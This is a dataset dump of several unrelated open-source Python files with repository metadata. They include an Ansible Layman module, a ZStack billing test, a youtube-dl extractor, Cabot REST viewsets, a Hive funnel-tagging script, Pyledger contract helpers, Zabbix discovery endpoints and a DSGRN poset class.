code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Jakub Jirutka <jakub@jirutka.cz>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: layman
author: "Jakub Jirutka (@jirutka)"
version_added: "1.6"
short_description: Manage Gentoo overlays
description:
- Uses Layman to manage an additional repositories for the Portage package manager on Gentoo Linux.
Please note that Layman must be installed on a managed node prior using this module.
requirements:
- "python >= 2.6"
- layman python module
options:
name:
description:
- The overlay id to install, synchronize, or uninstall.
Use 'ALL' to sync all of the installed overlays (can be used only when C(state=updated)).
required: true
list_url:
description:
- An URL of the alternative overlays list that defines the overlay to install.
This list will be fetched and saved under C(${overlay_defs})/${name}.xml), where
C(overlay_defs) is readed from the Layman's configuration.
required: false
state:
description:
- Whether to install (C(present)), sync (C(updated)), or uninstall (C(absent)) the overlay.
required: false
default: present
choices: [present, absent, updated]
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be
set to C(no) when no other option exists. Prior to 1.9.3 the code
defaulted to C(no).
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: '1.9.3'
'''
EXAMPLES = '''
# Install the overlay 'mozilla' which is on the central overlays list.
- layman:
name: mozilla
# Install the overlay 'cvut' from the specified alternative list.
- layman:
name: cvut
list_url: 'http://raw.github.com/cvut/gentoo-overlay/master/overlay.xml'
# Update (sync) the overlay 'cvut', or install if not installed yet.
- layman:
name: cvut
list_url: 'http://raw.github.com/cvut/gentoo-overlay/master/overlay.xml'
state: updated
# Update (sync) all of the installed overlays.
- layman:
name: ALL
state: updated
# Uninstall the overlay 'cvut'.
- layman:
name: cvut
state: absent
'''
import shutil
from os import path
try:
from layman.api import LaymanAPI
from layman.config import BareConfig
HAS_LAYMAN_API = True
except ImportError:
HAS_LAYMAN_API = False
USERAGENT = 'ansible-httpget'
class ModuleError(Exception):
pass
def init_layman(config=None):
'''Returns the initialized ``LaymanAPI``.
:param config: the layman's configuration to use (optional)
'''
if config is None:
config = BareConfig(read_configfile=True, quietness=1)
return LaymanAPI(config)
def download_url(module, url, dest):
'''
:param url: the URL to download
:param dest: the absolute path of where to save the downloaded content to;
it must be writable and not a directory
:raises ModuleError
'''
# Hack to add params in the form that fetch_url expects
module.params['http_agent'] = USERAGENT
response, info = fetch_url(module, url)
if info['status'] != 200:
raise ModuleError("Failed to get %s: %s" % (url, info['msg']))
try:
with open(dest, 'w') as f:
shutil.copyfileobj(response, f)
except IOError as e:
raise ModuleError("Failed to write: %s" % str(e))
def install_overlay(module, name, list_url=None):
'''Installs the overlay repository. If not on the central overlays list,
then :list_url of an alternative list must be provided. The list will be
fetched and saved under ``%(overlay_defs)/%(name.xml)`` (location of the
``overlay_defs`` is read from the Layman's configuration).
:param name: the overlay id
:param list_url: the URL of the remote repositories list to look for the overlay
definition (optional, default: None)
:returns: True if the overlay was installed, or False if already exists
(i.e. nothing has changed)
:raises ModuleError
'''
# read Layman configuration
layman_conf = BareConfig(read_configfile=True)
layman = init_layman(layman_conf)
if layman.is_installed(name):
return False
if module.check_mode:
mymsg = 'Would add layman repo \'' + name + '\''
module.exit_json(changed=True, msg=mymsg)
if not layman.is_repo(name):
if not list_url:
raise ModuleError("Overlay '%s' is not on the list of known " \
"overlays and URL of the remote list was not provided." % name)
overlay_defs = layman_conf.get_option('overlay_defs')
dest = path.join(overlay_defs, name + '.xml')
download_url(module, list_url, dest)
# reload config
layman = init_layman()
if not layman.add_repos(name):
raise ModuleError(layman.get_errors())
return True
def uninstall_overlay(module, name):
'''Uninstalls the given overlay repository from the system.
:param name: the overlay id to uninstall
:returns: True if the overlay was uninstalled, or False if doesn't exist
(i.e. nothing has changed)
:raises ModuleError
'''
layman = init_layman()
if not layman.is_installed(name):
return False
if module.check_mode:
mymsg = 'Would remove layman repo \'' + name + '\''
module.exit_json(changed=True, msg=mymsg)
layman.delete_repos(name)
if layman.get_errors():
raise ModuleError(layman.get_errors())
return True
def sync_overlay(name):
'''Synchronizes the specified overlay repository.
:param name: the overlay repository id to sync
:raises ModuleError
'''
layman = init_layman()
if not layman.sync(name):
messages = [ str(item[1]) for item in layman.sync_results[2] ]
raise ModuleError(messages)
def sync_overlays():
'''Synchronize all of the installed overlays.
:raises ModuleError
'''
layman = init_layman()
for name in layman.get_installed():
sync_overlay(name)
def main():
# define module
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True),
list_url = dict(aliases=['url']),
state = dict(default="present", choices=['present', 'absent', 'updated']),
validate_certs = dict(required=False, default=True, type='bool'),
),
supports_check_mode=True
)
if not HAS_LAYMAN_API:
module.fail_json(msg='Layman is not installed')
state, name, url = (module.params[key] for key in ['state', 'name', 'list_url'])
changed = False
try:
if state == 'present':
changed = install_overlay(module, name, url)
elif state == 'updated':
if name == 'ALL':
sync_overlays()
elif install_overlay(module, name, url):
changed = True
else:
sync_overlay(name)
else:
changed = uninstall_overlay(module, name)
except ModuleError as e:
module.fail_json(msg=e.message)
else:
module.exit_json(changed=changed, name=name)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
|
bearstech/ansible
|
lib/ansible/modules/packaging/os/layman.py
|
Python
|
gpl-3.0
| 7,605
|
'''
New Test For bill Operations
'''
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.operations.billing_operations as bill_ops
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.net_operations as net_ops
import threading
import time
import os
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
def create_bill(price, resource_name, time_unit, resource_unit):
test_util.test_logger('Create resource price')
inv = bill_ops.create_resource_price(resource_name, time_unit, price, resource_unit=resource_unit).dateInLong
return inv
def query_resource_price(uuid = None, price = None, resource_name = None, time_unit = None, resource_unit = None):
cond = []
if uuid:
cond = res_ops.gen_query_conditions('uuid', "=", uuid, cond)
if price:
cond = res_ops.gen_query_conditions('price', "=", price, cond)
if resource_name:
cond = res_ops.gen_query_conditions('resourceName', "=", resource_name, cond)
if time_unit:
cond = res_ops.gen_query_conditions('timeUnit', "=", time_unit, cond)
if resource_unit:
cond = res_ops.gen_query_conditions('resourceUnit', "=", resource_unit, cond)
result = bill_ops.query_resource_price(cond)
return result
def delete_price(price_uuid, delete_mode = None):
test_util.test_logger('Delete resource price')
result = bill_ops.delete_resource_price(price_uuid, delete_mode)
return result
def create_vm(name, image_uuid, host_uuid, instance_offering_uuid, l3_uuid, session_uuid=None):
vm_creation_option = test_util.VmOption()
vm_creation_option.set_name(name)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_l3_uuids([l3_uuid])
if host_uuid:
vm_creation_option.set_host_uuid(host_uuid)
if session_uuid:
vm_creation_option.set_session_uuid(session_uuid)
vm = test_stub.create_vm(vm_creation_option)
return vm
def test():
# test_stub.update_billing_symbol()
cond = res_ops.gen_query_conditions('system', '=', 'false')
imageUuid = res_ops.query_resource_fields(res_ops.IMAGE, cond)[0].uuid
cond = res_ops.gen_query_conditions('type', '=', 'UserVm')
instanceOfferingUuid = res_ops.query_resource_fields(res_ops.INSTANCE_OFFERING, cond)[0].uuid
cond = res_ops.gen_query_conditions('name', '=', 'public network')
l3NetworkUuids = res_ops.query_resource_fields(res_ops.L3_NETWORK, cond)[0].uuid
vm_name = 'vm-1'
create_bill(1, "pubIpVmNicBandwidthIn", "s", "m")
resourcePrices = query_resource_price()
for resource_price in resourcePrices:
delete_price(resource_price.uuid)
##parallel create bill
counter = 0
for i in range(0, 200):
ipin = threading.Thread(target=create_bill, args=(i, "pubIpVmNicBandwidthIn", "s", "k"))
ipout = threading.Thread(target=create_bill, args=(i, "pubIpVmNicBandwidthOut", "m", "m"))
vipin = threading.Thread(target=create_bill, args=(i, "pubIpVipBandwidthIn", "h", "g"))
vipout = threading.Thread(target=create_bill, args=(i, "pubIpVipBandwidthOut", "d", "m"))
while threading.active_count() > 10:
time.sleep(3)
ipin.start()
ipout.start()
vipin.start()
vipout.start()
#Delete all price
resourcePrices = query_resource_price()
##wait 15s for all prices created
i = 0
while len(resourcePrices) != 800:
print len(resourcePrices)
time.sleep(3)
if i > 5:
test_util.test_fail("Fail to create 800 prices")
i = i + 1
resourcePrices = query_resource_price()
#Delete all price
for resource_price in resourcePrices:
delete_price(resource_price.uuid)
ipin = threading.Thread(target=create_bill, args=(10, "pubIpVmNicBandwidthIn", "s", "m"))
ipout = threading.Thread(target=create_bill, args=(10, "pubIpVmNicBandwidthOut", "s", "m"))
vipin = threading.Thread(target=create_bill, args=(10, "pubIpVipBandwidthIn", "s", "m"))
vipout = threading.Thread(target=create_bill, args=(10, "pubIpVipBandwidthOut", "s", "m"))
ipin.start()
ipout.start()
vipin.start()
vipout.start()
#Create vm nic qos
net_bandwidth = 10*1024*1024
vm = create_vm(vm_name, imageUuid, None,instanceOfferingUuid, l3NetworkUuids)
vm_inv = vm.get_vm()
vm_nic = test_lib.lib_get_vm_nic_by_l3(vm_inv, l3NetworkUuids)
vm_ops.set_vm_nic_qos(vm_nic.uuid, outboundBandwidth = net_bandwidth, inboundBandwidth = net_bandwidth)
cond = res_ops.gen_query_conditions('name', '=', 'admin')
time.sleep(1)
admin_uuid = res_ops.query_resource_fields(res_ops.ACCOUNT, cond)[0].uuid
prices = bill_ops.calculate_account_spending(admin_uuid)
if prices.total < 180:
test_util.test_fail("test billing fail, bill is lesser than 180 after vm nic qos set")
#Delete vm nic qos
vm_ops.del_vm_nic_qos(vm_nic.uuid, "in")
vm_ops.del_vm_nic_qos(vm_nic.uuid, "out")
time.sleep(1)
# Total cost should not grow up
price1 = bill_ops.calculate_account_spending(admin_uuid)
time.sleep(2)
price2 = bill_ops.calculate_account_spending(admin_uuid)
if price1.total != price2.total:
test_util.test_fail("test billing fail, bill still grows up after deleting vm nic qos. price1 total: %s, price2 total: %s" % (price1.total, price2.total))
#Delete vm nic resource price
price_ipin = query_resource_price(resource_name = "pubIpVmNicBandwidthIn")[0]
price_ipout = query_resource_price(resource_name = "pubIpVmNicBandwidthOut")[0]
delete_price(price_ipin.uuid)
delete_price(price_ipout.uuid)
price3 = bill_ops.calculate_account_spending(admin_uuid)
#make sure vm nic resource price has been deleted
price_ipin = query_resource_price(resource_name = "pubIpVmNicBandwidthIn")
price_ipout = query_resource_price(resource_name = "pubIpVmNicBandwidthOut")
if len(price_ipin) > 0 or len(price_ipout)> 0:
test_util.test_fail("Fail to clean vm nic resource price. length of pubIpVmNicBandwidthIn: %d, length of pubIpVmNicBandwidthOut: %d" %(len(price_ipin), len(price_ipout)))
# price.total should not grow up, after the prices are deleted
price4 = bill_ops.calculate_account_spending(admin_uuid)
if price4.total != price3.total:
test_util.test_fail("test billing fail, bill still grows up after deleting prices. price4 total:%s, price3 total: %s" % (price4.total, price3.total))
#create vip qos
vip = test_stub.create_vip("test_vip_qos_price", l3NetworkUuids)
vip_uuid = vip.get_vip().uuid
vip_qos = net_ops.set_vip_qos(vip_uuid=vip_uuid, inboundBandwidth = net_bandwidth, outboundBandwidth = net_bandwidth)
time.sleep(1)
prices = bill_ops.calculate_account_spending(admin_uuid)
if prices.total < 180:
print prices.total
test_util.test_fail("test billing fail, bill is lesser than 180 after vip qos set")
#Delete vip qos
net_ops.delete_vip_qos(vip_uuid)
time.sleep(1)
# Total cost should not grow up
price1 = bill_ops.calculate_account_spending(admin_uuid)
time.sleep(2)
price2 = bill_ops.calculate_account_spending(admin_uuid)
if price1.total != price2.total:
test_util.test_fail("test billing fail, bill still grows up after deleting vip qos. price1 total: %s, price2 total: %s" % (price1.total, price2.total))
#Delete vip resource price
price_vipin = query_resource_price(resource_name = "pubIpVipBandwidthIn")[0]
price_vipout = query_resource_price(resource_name = "pubIpVipBandwidthOut")[0]
delete_price(price_vipin.uuid)
delete_price(price_vipout.uuid)
price3 = bill_ops.calculate_account_spending(admin_uuid)
#make sure vm nic resource price has been deleted
price_vipin = query_resource_price(resource_name = "pubIpVipBandwidthIn")
price_vipout = query_resource_price(resource_name = "pubIpVipBandwidthOut")
if len(price_vipin) > 0 or len(price_vipout)> 0:
test_util.test_fail("Fail to clean vip resource price. length of pubIpVipBandwidthIn: %d, length of pubIpVipBandwidthOut: %d" %(len(price_vipin), len(price_vipout)))
# price.total should be 0, after the prices are deleted
price4 = bill_ops.calculate_account_spending(admin_uuid)
if price4.total != price3.total:
test_util.test_fail("test billing fail, bill is still grows up after deleting vip prices. price4 total: %s, price3 total: %s" % (price4.total, price3.total))
test_util.test_pass("test billing pass")
def error_cleanup():
pass
|
zstackio/zstack-woodpecker
|
integrationtest/vm/simulator/public_billing/test_public_ip_biling.py
|
Python
|
apache-2.0
| 8,861
|
from __future__ import unicode_literals
from .common import InfoExtractor
class WorldStarHipHopIE(InfoExtractor):
_VALID_URL = r'https?://(?:www|m)\.worldstar(?:candy|hiphop)\.com/(?:videos|android)/video\.php\?.*?\bv=(?P<id>[^&]+)'
_TESTS = [{
'url': 'http://www.worldstarhiphop.com/videos/video.php?v=wshh6a7q1ny0G34ZwuIO',
'md5': '9d04de741161603bf7071bbf4e883186',
'info_dict': {
'id': 'wshh6a7q1ny0G34ZwuIO',
'ext': 'mp4',
'title': 'KO Of The Week: MMA Fighter Gets Knocked Out By Swift Head Kick!'
}
}, {
'url': 'http://m.worldstarhiphop.com/android/video.php?v=wshh6a7q1ny0G34ZwuIO',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
entries = self._parse_html5_media_entries(url, webpage, video_id)
if not entries:
return self.url_result(url, 'Generic')
title = self._html_search_regex(
[r'(?s)<div class="content-heading">\s*<h1>(.*?)</h1>',
r'<span[^>]+class="tc-sp-pinned-title">(.*)</span>'],
webpage, 'title')
info = entries[0]
info.update({
'id': video_id,
'title': title,
})
return info
|
vinegret/youtube-dl
|
youtube_dl/extractor/worldstarhiphop.py
|
Python
|
unlicense
| 1,344
|
from django.db import models as model_fields
from django.conf import settings
from django.conf.urls import url, include
from django.contrib.auth import models as django_models
from polymorphic import PolymorphicModel
from cabot.cabotapp import models, alert
from rest_framework import routers, serializers, viewsets, mixins
import logging
logger = logging.getLogger(__name__)
router = routers.DefaultRouter()
def create_viewset(arg_model, arg_fields, arg_read_only_fields=(), no_create=False):
arg_read_only_fields = ('id',) + arg_read_only_fields
for field in arg_read_only_fields:
if field not in arg_fields:
arg_fields = arg_fields + (field,)
class Serializer(serializers.ModelSerializer):
class Meta:
model = arg_model
fields = arg_fields
read_only_fields = arg_read_only_fields
viewset_class = None
if no_create:
class NoCreateViewSet(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
pass
viewset_class = NoCreateViewSet
else:
viewset_class = viewsets.ModelViewSet
arg_queryset = None
if issubclass(arg_model, PolymorphicModel):
arg_queryset = arg_model.objects.instance_of(arg_model)
else:
arg_queryset = arg_model.objects.all()
class ViewSet(viewset_class):
queryset = arg_queryset
serializer_class = Serializer
ordering = ['id']
filter_fields = arg_fields
return ViewSet
check_group_mixin_fields = (
'name',
'users_to_notify',
'alerts_enabled',
'status_checks',
'alerts',
'hackpad_id',
)
router.register(r'services', create_viewset(
arg_model=models.Service,
arg_fields=check_group_mixin_fields + (
'url',
'instances',
'overall_status',
),
))
router.register(r'instances', create_viewset(
arg_model=models.Instance,
arg_fields=check_group_mixin_fields + (
'address',
'overall_status',
),
))
status_check_fields = (
'name',
'active',
'importance',
'frequency',
'debounce',
'calculated_status',
)
router.register(r'status_checks', create_viewset(
arg_model=models.StatusCheck,
arg_fields=status_check_fields,
no_create=True,
))
router.register(r'icmp_checks', create_viewset(
arg_model=models.ICMPStatusCheck,
arg_fields=status_check_fields,
))
router.register(r'graphite_checks', create_viewset(
arg_model=models.GraphiteStatusCheck,
arg_fields=status_check_fields + (
'metric',
'check_type',
'value',
'expected_num_hosts',
'allowed_num_failures',
),
))
router.register(r'http_checks', create_viewset(
arg_model=models.HttpStatusCheck,
arg_fields=status_check_fields + (
'endpoint',
'username',
'password',
'text_match',
'status_code',
'timeout',
'verify_ssl_certificate',
),
))
router.register(r'jenkins_checks', create_viewset(
arg_model=models.JenkinsStatusCheck,
arg_fields=status_check_fields + (
'max_queued_build_time',
),
))
# User API is off by default, could expose/allow modifying dangerous fields
if settings.EXPOSE_USER_API:
router.register(r'users', create_viewset(
arg_model=django_models.User,
arg_fields=(
'password',
'is_active',
'groups',
#'user_permissions', # Doesn't work, removing for now
'username',
'first_name',
'last_name',
'email',
),
))
router.register(r'user_profiles', create_viewset(
arg_model=models.UserProfile,
arg_fields=(
'user',
'fallback_alert_user',
),
))
router.register(r'shifts', create_viewset(
arg_model=models.Shift,
arg_fields=(
'start',
'end',
'user',
'uid',
'deleted',
)
))
router.register(r'alertplugins', create_viewset(
arg_model=alert.AlertPlugin,
arg_fields=(
'title',
)
))
|
cmclaughlin/cabot
|
cabot/rest_urls.py
|
Python
|
mit
| 4,286
|
# -*- coding: utf-8 -*-
"""
author: ferris
function: trace the trigger actions and their prior actions for funnel, and add source tags to funnel steps
"""
from pyhive import hive
import pandas as pd
import numpy as np
import datetime
import os
# def in_manually():
# df = pd.read_csv('./data_hive.csv', delimiter='\t')
# df.columns = ['user_id', 'mysql_id', 'time', 'sn', 'action', 'category', 'page_name', 'session_id',
# 'platform', 'app_marketing_version', 'data_date']
# return df
def hive_to_df(sql=""):
"""
execute sql in hive and return pandas DataFrame
Args:
sql: sql string
Returns: pandas DataFrame
"""
print('connecting')
cursor = hive.connect('localhost').cursor()
print('query start')
cursor.execute(sql)
cont = cursor.fetchall()
cols = cursor.description
col_names = [j[0] for j in cols]
tmp_data = pd.DataFrame(data=cont, columns=col_names)
return tmp_data
def df_to_hive(file_dir, file_name, hdfs_dir, table_name, date_str):
"""
copy local file into HDFS directory, and load into external partition table
Args:
file_dir: file directory
file_name: file name
hdfs_dir: HDFS directory
table_name: hive table name
date_str: date partition string
Returns: None
"""
print("copy to hdfs")
hdfs_cmd = "hadoop fs -cp {0}{1} {2}".format(file_dir, file_name, hdfs_dir)
os.system(hdfs_cmd)
print("load into hive")
cli_cmd = "load data inpath {0}{1} into table {2} partition(data_date={3})" \
.format(hdfs_dir, file_name, table_name, date_str)
hive_cmd = "hive -e '{0}' ".format(cli_cmd)
os.system(hive_cmd)
print("load complete")
return None
def file_to_sql(file_path):
"""
generate sql string from sql script without comments
Args:
file_path: sql script
Returns: sql string
"""
f_in = open(file_path, 'r')
sql_lines = []
sql_combined = ''
for r in f_in:
l = r.strip()
sql_lines.append(l)
sql_combined = ' '.join(sql_lines)
return sql_combined
def set_route(df):
"""
define a route column for tagging record type:
1. funnel
2. entrances: the actions to trigger the funnel
3. actions: the necessary prior actions to entrances
Returns: pandas DataFrame
"""
# add blank column
df['route'] = ''
# define funnel
df.loc[df['page_name'].isin(['order', 'order_pay']) | (df['action'] == 'click_pay'), 'route'] = 'f'
# define entrance for funnel
df.loc[(df['action'] == 'click_buy_cc') & (df['page_name'] == 'course_intro_ccbasic'), 'route'] = 'e1'
df.loc[(df['action'] == 'start_buy_cc') & (df['page_name'] == 'view_improve_plan'), 'route'] = 'e2'
df.loc[(df['action'] == 'click_buy'), 'route'] = 'e3'
# define prior actions for entrance
df.loc[df['action'].isin(
['click_cc_buy_in_badge', 'click_cc_buy_in_rank', 'click_cc_purchaseinfo_pic', 'click_cc_purchaseinfo_text',
'click_lesson_in_store', 'click_more_lesson', 'click_grab']), 'route'] = 'a1'
df.loc[df['action'].isin(['confirm_daily_studytime']), 'route'] = 'a2'
# remove useless data
df = df[df['route'] != '']
df = df.reset_index(drop=True)
return df
def work_flow(start_date, end_date):
"""
read data, add source tags to funnel records, output to hive
Args:
start_date: 'yyyy-mm-dd' string
end_date: 'yyyy-mm-dd' string
Returns: None
"""
# read data from hive
# set start_date to 1 day before
start_value = datetime.date(int(start_date[0:4]), int(start_date[5:7]), int(start_date[8:])) - datetime.timedelta(
days=1)
start_str = start_value.isoformat()
end_str = end_date
hql = file_to_sql('./data_hive.hql').format(start_str, end_str)
df = hive_to_df(sql=hql)
# pre-allocate series
source_e = pd.Series('', index=np.arange(df.shape[0])) # tracking entrances
source_a = pd.Series('', index=np.arange(df.shape[0])) # tracking actions prior to entrances
# init trackers
print("init trackers")
rt_a = tr_a = tr_e = tr_l = tr_p = tr_u = tr_v = 'unknown'
# update & apply trackers
for i, row in df.iterrows():
if i % 500 == 0:
print("step {0}".format(str(i)))
# reset on new user, platform, version
if (row['mysql_id'] != tr_u) or (row['platform'] != tr_p) or (row['app_marketing_version'] != tr_v):
rt_a = tr_a = tr_e = tr_l = 'unknown'
# update action tracker
if row['route'][0] == 'a':
tr_a = row['action']
# bind actions to entrances when they match, update entrance tracker
elif row['route'][0] == 'e':
if rt_a[1] == row['route'][1]:
source_a[i] = tr_a
tr_l = tr_a
tr_e = row['action']
# bind actions and entrances to funnel
elif row['route'] == 'f':
source_e[i] = tr_e
source_a[i] = tr_l
else:
source_e[i] = 'unknown'
source_a[i] = 'unknown'
# update other trackers for the same user, platform, version
tr_p = row['platform']
tr_u = row['mysql_id']
tr_v = row['app_marketing_version']
# remove useless data
print('clean results')
df['source_e'] = source_e
df['source_a'] = source_a
flt = df[df['route'] == 'f']
flt = flt[~(flt['source_e'] == 'click_buy')] # remove irrelevant funnel
flt = flt[flt['data_date'].between(start_date, end_date)]
print(1.0 * (flt['source_e'] != 'unknown').sum() / flt.shape[0])
print(1.0 * (flt['source_a'] != 'unknown').sum() / flt.shape[0])
# percent of source tracked
flt.groupby(['source_e']).apply(lambda x: x.shape[0])
flt.groupby(['source_a']).apply(lambda x: x.shape[0])
# output to file
out_name = 'tmp_out_{0}'.format(end_date[1:-1])
flt.to_csv(out_name, header=None, index=None, sep='\t')
# output to hive
out_table = "cc_funnel_source"
df_to_hive(file_dir=os.system("pwd"),
file_name=out_name,
hdfs_dir="s3://warehouse/analysis/{0}/".format(out_table),
table_name=out_table,
date_str=end_date)
if __name__ == "__main__":
work_flow()
# df = in_manually()
# df = set_route(df)
# xx = df[df['data_date']=='2016-06-11']
# xx = xx[xx['page_name']=='course_intro_ccbasic']
# yy = xx[xx['source']=='unknown']
|
ferris-wufei/toolbox
|
dw/dw_funnel_source/archive/funnel_source.py
|
Python
|
gpl-2.0
| 6,513
|
# Pyledger. A simple ledger for smart contracts implemented in Python
# Copyright (C) 2017 Guillem Borrell Nogueras
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import abc
import datetime
import inspect
from pyledger.server.db import DB, Contract, Status
from pyledger.server.status import SimpleStatus
contract_registry = {}
class BaseContract(abc.ABC):
pass
class SimpleContract(BaseContract):
"""
Contract that uses SimpleStatus for serialization.
The goal of this class is to make a contact feel just like a Python class.
"""
_status_class = SimpleStatus
BaseContract.register(SimpleContract)
def methods(contract):
"""
Obtain methods from the contract
:param contract:
:return:
"""
methods = {}
for name, function in inspect.getmembers(contract,
predicate=inspect.ismethod):
if not name == '__init__':
methods[name] = function
return methods
def api(contract):
api_spec = {}
contract_methods = methods(contract)
for method in contract_methods:
function_spec = {}
sig = inspect.signature(contract_methods[method])
for param in sig.parameters:
function_spec[param] = sig.parameters[param].annotation
api_spec[method] = function_spec
return api_spec
def signatures(contract):
contract_signatures = {}
contract_methods = methods(contract)
for k, method in contract_methods.items():
contract_signatures[k] = inspect.signature(method)
return contract_signatures
def status(contract):
all_attributes = inspect.getmembers(
contract,
predicate=lambda a: not(inspect.isroutine(a)))
attributes = {}
for attribute in all_attributes:
if not attribute[0].startswith('_'):
attributes[attribute[0]] = attribute[1]
return contract._status_class(**attributes)
def register_contract(contract, description=''):
"""
Register a contract and make it
:param contract:
:param description:
:return:
"""
global contract_registry
if contract.__class__.__name__ in contract_registry:
raise ValueError('A contract with the same name already registered')
else:
contract_registry[contract.__class__.__name__] = contract
db_contract = Contract()
db_contract.name = contract.__class__.__name__
db_contract.created = datetime.datetime.now()
db_contract.description = description
first_status = Status()
first_status.contract = db_contract
first_status.when = datetime.datetime.now()
first_status.attributes = status(contract).dump()
# Genesis key is the name of the contract
first_status.key = contract.__class__.__name__.encode('utf-8')
DB.session.add(db_contract)
DB.session.add(first_status)
DB.session.commit()
|
guillemborrell/pyledger
|
pyledger/server/contract.py
|
Python
|
agpl-3.0
| 3,527
|
"""
Discovery-related Resource Classes for flask_restful
"""
import json
import logging
from flask import request
from flask_restful import Resource
from es_stats_zabbix.exceptions import NotFound
from es_stats_zabbix.defaults.settings import APIS
from es_stats_zabbix.helpers.batch import get_endpoints, lldoutput, macrogen
from es_stats_zabbix.helpers.config import extract_endpoints
from es_stats_zabbix.helpers.utils import get_nodeid, get_cluster_macros, get_node_macros
class Discovery(Resource):
"""
Endpoint Discovery Resource Class for flask_restful
"""
def __init__(self, statobjs, do_not_discover, endpoints):
self.statobjs = statobjs
self.dnd = do_not_discover
self.raw_endpoints = endpoints
self.logger = logging.getLogger('esz.Discovery')
def get(self):
"""GET method"""
return self.post()
def post(self):
"""POST method"""
endpoints = extract_endpoints(self.raw_endpoints)
node = None
show_all = False
self.logger.debug('request.data contents = {}'.format(request.data))
if request.data != b'':
# Must decode to 'utf-8' for older versions of Python
json_data = json.loads(request.data.decode('utf-8'))
node = json_data['node'] if 'node' in json_data else None
show_all = json_data['show_all'] if 'show_all' in json_data else False
results = macrogen(self.statobjs, self.dnd, node=node,
included=None if show_all else endpoints)
llddata = lldoutput(results)
return {'data': llddata}
class ClusterDiscovery(Resource):
"""
Cluster and Node Discovery Resource Class for flask_restful
"""
def __init__(self, statobjs):
self.logger = logging.getLogger('esz.ClusterDiscovery')
self.statobjs = statobjs
self.statobj = statobjs['nodeinfo']
self.nodeinfo = self.statobj.cached_read('nodeinfo')['nodes']
def get(self, value):
"""GET method"""
return self.post(value)
def post(self, value):
"""POST method"""
self.logger.debug('request.data contents = {}'.format(request.data))
flag = None
if request.data != b'':
# Must decode to 'utf-8' for older versions of Python
json_data = json.loads(request.data.decode('utf-8'))
flag = json_data['flag'] if 'flag' in json_data else None
if flag:
# Placeholder if needed.
pass
macros = []
if value == 'cluster':
nodeid = list(self.nodeinfo.keys())[0]
self.logger.debug('Value is "cluster." Returning LLD data for the cluster...')
self.logger.debug('Using nodeid {0} for cluster data'.format(nodeid))
macros.append(get_cluster_macros(self.statobj, nodeid))
elif value == 'nodes':
self.logger.debug('Value is "nodes." Returning LLD data for all discovered nodes...')
for nodeid in self.nodeinfo:
macros.append(get_cluster_macros(self.statobj, nodeid))
return {'data': macros}
class NodeDiscovery(Resource):
"""
Node Discovery Resource Class for flask_restful
"""
def __init__(self, statobjs):
self.logger = logging.getLogger('esz.NodeDiscovery')
self.statobjs = statobjs
self.statobj = statobjs['nodeinfo']
self.nodeinfo = self.statobj.cached_read('nodeinfo')['nodes']
def get(self, node):
"""GET method"""
return self.post(node)
def post(self, node):
"""POST method"""
self.logger.debug('request.data contents = {}'.format(request.data))
flag = None
if request.data != b'':
# Must decode to 'utf-8' for older versions of Python
json_data = json.loads(request.data.decode('utf-8'))
flag = json_data['flag'] if 'flag' in json_data else None
try:
nodeid = get_nodeid(self.statobjs, node)
except NotFound:
return {'data': []}
if flag:
pass # Placeholder to quiet pylint
macros = get_node_macros(self.statobj, nodeid)
return {'data': macros}
class DisplayEndpoints(Resource):
"""
Endpoint Display Resource Class for flask_restful
"""
def __init__(self, statobjs):
self.statobjs = statobjs
self.logger = logging.getLogger('esz.DisplayEndpoints')
def get(self):
"""GET method"""
return self.post()
def post(self):
"""POST method"""
node = None
self.logger.debug('request.data contents = {}'.format(request.data))
if request.data != b'':
# Must decode to 'utf-8' for older versions of Python
json_data = json.loads(request.data.decode('utf-8'))
node = json_data['node'] if 'node' in json_data else None
results = {}
node = node if node else self.statobjs['health'].local_name
for api in APIS:
results[api] = get_endpoints(self.statobjs, api, node=node)[api]
self.logger.debug('RESULTS = {0}'.format(results))
return results
|
untergeek/es_stats_zabbix
|
es_stats_zabbix/backend/discovery.py
|
Python
|
apache-2.0
| 5,177
|
# PosetOfExtrema.py
# MIT LICENSE
# Shaun Harker 2016-12-27
from DSGRN._dsgrn import *
class PosetOfExtrema(Pattern):
def __init__(self, network, events, orderings):
"""
Initializes a poset of extrema
network is a DSGRN network object
events is a list of tuples of the form (NAME,'min') or (NAME,'max') for NAME a name of a node in the network
orderings is list of event orderings (the code will perform transitive closure automatically), i.e.
a list of pairs (i,j) such that events[i] occurs before events[j]
"""
# Save variables
self.network_ = network
self.labels_ = [ event[0] + " " + event[1] for event in events]
# Construct Digraph from event and ordering data
digraph = Digraph()
for event in events:
digraph.add_vertex()
for edge in orderings:
digraph.add_edge(edge[0], edge[1])
self.poset_ = Poset(digraph)
